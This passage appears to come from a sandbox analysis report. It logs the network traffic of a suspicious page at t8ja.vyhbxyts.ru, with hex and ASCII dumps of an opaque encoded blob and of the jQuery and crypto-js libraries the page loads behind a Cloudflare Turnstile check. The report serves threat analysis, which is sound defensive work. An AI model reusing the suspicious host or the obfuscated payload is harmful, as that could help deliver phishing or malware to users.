Wk776g776g776g44Wk776g44Wk776g776g776g776g776g44Wk776g776g776g44Wk776g776g44Wk44Wk776g44Wk776g44Wk44Wk776g44Wk44Wk776g776g44Wk776g44Wk776g44Wk44Wk44Wk44Wk776g776g44Wk776g44Wk44Wk776g776g44Wk776g776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk4
2025-03-06 21:54:49 UTC	1369	IN	Data Raw: 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 Data Ascii: k44Wk44Wk776g776g776g44Wk776g776g776g776g776g776g44Wk776g776g44Wk776g776g776g776g44Wk776g776g776g44Wk776g44Wk776g44Wk44Wk776g776g776g44Wk776g776g44Wk776g44Wk776g44Wk44Wk44Wk776g44Wk776g44Wk776g776g776g776g776g44Wk776g44Wk776g776g44Wk776g776g44Wk44Wk44Wk77
2025-03-06 21:54:49 UTC	1369	IN	Data Raw: 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 Data Ascii: 776g44Wk44Wk776g776g776g44Wk44Wk44Wk776g776g44Wk44Wk776g44Wk776g776g776g776g44Wk44Wk776g776g44Wk776g776g776g776g776g776g776g44Wk44Wk44Wk44Wk776g44Wk776g776g44Wk776g776g776g776g776g776g44Wk776g44Wk44Wk776g44Wk44Wk776g776g776g776g44Wk776g44Wk776g776g776g44W
2025-03-06 21:54:49 UTC	1369	IN	Data Raw: 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 Data Ascii: 76g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g44Wk44Wk44Wk44Wk776g44Wk44Wk776g

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:54:51 UTC	663	OUT	GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://t8ja.vyhbxyts.ru/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-03-06 21:54:52 UTC	386	IN	HTTP/1.1 302 Found Date: Thu, 06 Mar 2025 21:54:52 GMT Content-Length: 0 Connection: close access-control-allow-origin: * cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public cross-origin-resource-policy: cross-origin location: /turnstile/v0/g/f3b948d8acb8/api.js Server: cloudflare CF-RAY: 91c518133f0f4210-EWR alt-svc: h3=":443"; ma=86400

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:54:51 UTC	622	OUT	GET /jquery-3.6.0.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://t8ja.vyhbxyts.ru/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-03-06 21:54:52 UTC	613	IN	HTTP/1.1 200 OK Connection: close Content-Length: 89501 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-15d9d" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Thu, 06 Mar 2025 21:54:52 GMT Age: 2539694 X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740050-EWR X-Cache: HIT, HIT X-Cache-Hits: 2774, 3 X-Timer: S1741298092.051935,VS0,VE0 Vary: Accept-Encoding
2025-03-06 21:54:52 UTC	1378	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2025-03-06 21:54:52 UTC	1378	IN	Data Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66 Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
2025-03-06 21:54:52 UTC	1378	IN	Data Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f Data Ascii: on(e){var t,n;return!(!e\|\|"[object Object]"!==o.call(e))&&(!(t=r(e))\|\|"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
2025-03-06 21:54:52 UTC	1378	IN	Data Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74 Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked\|selected\|async\|autofocus\|autoplay\|controls\|defer\|disabled\|hidden\|ismap\|loop\|multiple\|open\|readonly\|required\|scoped",M="[\\x20\\t
2025-03-06 21:54:52 UTC	1378	IN	Data Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?\|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t\|\|(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10\|55296,1023&n\|56320))},re=/([\0-\x1f\x7f]\|^-?\d)\|^-$\|[^\0-\x1f\
2025-03-06 21:54:52 UTC	1378	IN	Data Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28 Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)\|\|e)===e&&d.scope\|\|((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
2025-03-06 21:54:52 UTC	1378	IN	Data Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument\|
2025-03-06 21:54:52 UTC	1378	IN	Data Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28 Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
2025-03-06 21:54:52 UTC	1378	IN	Data Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27 Data Ascii: ["+M+"name"+M+"="+M+"(?:''\|\"\")"),e.querySelectorAll(":checked").length\|\|v.push(":checked"),e.querySelectorAll("a#"+S+"+").length\|\|v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
2025-03-06 21:54:52 UTC	1378	IN	Data Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n\|\|(1&(n=(e.ownerDocument\|\|e)==(t.ownerDocument\|\|t)?e.compareDocumentPosition(t):1)\|\|!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C\|\|e.ownerDocument==p&&y(p,e)?-1:t==C\|\|t.ownerDocument==p

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:54:51 UTC	650	OUT	GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://t8ja.vyhbxyts.ru/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-03-06 21:54:52 UTC	958	IN	HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 21:54:52 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"61182885-40eb" Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 881472 Expires: Tue, 24 Feb 2026 21:54:52 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9neRB8WcEQ13GoTaW%2BdYMKxlvUr4k7u6vrv%2BRBk7lfntSWfliKDH%2BWGF06dpUAxVfF5hIbRNHHx1tftTgkSJUYlHSofVMRV2CgGnRwSSvpPoC2EdPWrrQAufEy1xKmKxzaUpzMQ2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 91c518140dc84213-EWR alt-svc: h3=":443"; ma=86400
2025-03-06 21:54:52 UTC	411	IN	Data Raw: 37 62 66 34 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b Data Ascii: 7bf4!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U\|\|function(h){
2025-03-06 21:54:52 UTC	1369	IN	Data Raw: 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.crea
2025-03-06 21:54:52 UTC	1369	IN	Data Raw: 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 Data Ascii: all(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)
